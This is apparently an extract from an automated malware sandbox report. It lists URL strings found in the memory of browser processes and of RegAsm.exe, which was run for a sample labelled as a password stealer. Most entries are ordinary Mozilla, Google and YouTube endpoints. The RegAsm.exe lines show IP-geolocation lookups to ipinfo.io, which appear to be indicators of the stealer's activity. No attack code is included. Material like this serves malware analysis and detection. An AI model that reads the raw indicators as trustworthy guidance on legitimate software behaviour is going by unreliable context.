Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i.ytimg.com/vi/AERLXaPKn_U/mqdefault.jpg
Source: firefox.exe, 00000033.00000003.2965630189.0000026F5B7B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2966736396.0000026F5B7B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
Source: firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: 8C6F11CBE3CE399118F0B2BF3995645C907F91B8.51.dr	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/baseline/1/137d78ac-f803-47ba-aeb6-e12
Source: 4EBBFD07DA38C337E9CA829910332B2039EE00B4.51.dr	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/4db4139f-6dcf-40ae-
Source: 3763D73D3A56359CC8410652776F61D6066EFA49.51.dr	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/fa67d5ff-77bd-4aa6-
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/&Q
Source: RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2594202655.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-address
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/154.16.192.193
Source: RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/154.16.192.193#
Source: RegAsm.exe, 00000002.00000002.2596470514.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/154.16.192.193W
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000033.00000003.2901112788.0000026F4AAC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000033.00000003.2829314950.0000026F4AAB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000033.00000003.2901112788.0000026F4AAF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640774157.0000026F4F66C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000033.00000003.2638275620.0000026F517E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000033.00000003.2638275620.0000026F517E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000033.00000003.2981976697.0000026F5D82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000031.00000002.4727131464.0000020338FD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2820309508.0000026F4CBB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2815640094.0000026F4CBB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2641907380.0000026F4CBC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674562682.0000026F4CBC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pagead2.googlesyndication.com/activeview_ext?id=
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: https://pki.goog/repository/0
Source: chromecache_973.22.dr	String found in binary or memory: https://play.google.com/intl/
Source: chromecache_973.22.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674983856.0000026F4CB98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/privacy
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/privacy/additional
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/privacy/additional/embedded?gl=kr
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/privacy/google-partners
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/technologies/cookies
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/technologies/location-data
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/terms
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/terms/location/embedded
Source: chromecache_973.22.dr	String found in binary or memory: https://policies.google.com/terms/service-specific
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: firefox.exe, 00000033.00000003.2821020703.0000026F4CBA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2899348946.0000026F4CBA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com
Source: firefox.exe, 00000033.00000003.2828247042.0000026F4CB2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900465875.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821546672.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-linux-x64.zip
Source: firefox.exe, 00000033.00000003.2828247042.0000026F4CB2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900465875.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821546672.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-mac-arm64.zip
Source: firefox.exe, 00000033.00000003.2828247042.0000026F4CB2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900465875.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821546672.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-mac-x64.zip
Source: firefox.exe, 00000033.00000003.2828247042.0000026F4CB2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900465875.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821546672.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-arm64.zip
Source: firefox.exe, 00000033.00000003.2827138310.0000026F4EC34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2828247042.0000026F4CB2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900465875.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821546672.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x64.zip
Source: firefox.exe, 00000033.00000003.2828247042.0000026F4CB2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900465875.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821546672.0000026F4CB42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x86.zip
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rr3---sn-n4v7sns7.googlevideo.com/videoplayback?expire=1697267654&source=youtube&requiressl=
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993057754.0000026F5DBA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.youtube.com
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.youtube.com/api/stats/atr?docid=
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.youtube.com/api/stats/delayplay?cl=
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.youtube.com/api/stats/playback?cl=
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.youtube.com/api/stats/qoe?cl=
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.youtube.com/api/stats/watchtime?cl=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2820309508.0000026F4CBB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2815640094.0000026F4CBB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2641907380.0000026F4CBC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674562682.0000026F4CBC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642629143.0000026F4C7AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000033.00000003.2957224507.0000026F5B267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000033.00000003.2901112788.0000026F4AAF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://snippets.mozilla.com/show/
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://spocs.getpocket.com/user
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-email-pin.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-password.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-sms-or-voice-pin.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-sms-pin.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-stop-go-landing-page_1x.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/animation/
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/ble_device.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/ble_pin.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_1x.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_2x.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/continue_on_your_phone.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_phone_number_verification.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_tap_yes.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kid_success.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_updated.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_not_ready.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_stick_around.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_account.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_privacy.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_created.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_double_device.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_full_house.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_link_accounts.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_app_decision.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_supervision.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_respect_others_updated.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_single_device.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_stop.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/personalization_reminders.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/phone_number_sign_in_2x.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_ios_center.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_laptop.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_nfc_discovered.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_phone.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/signin_googleapp_ios.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/signin_googleapp_pulldown.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/signin_tapyes.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/smart_lock_2x.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/usb_key.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/web_and_app_activity.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/who_will_be_using_this_device.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/you_tube_history.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/gmail_ios_authzen.gif
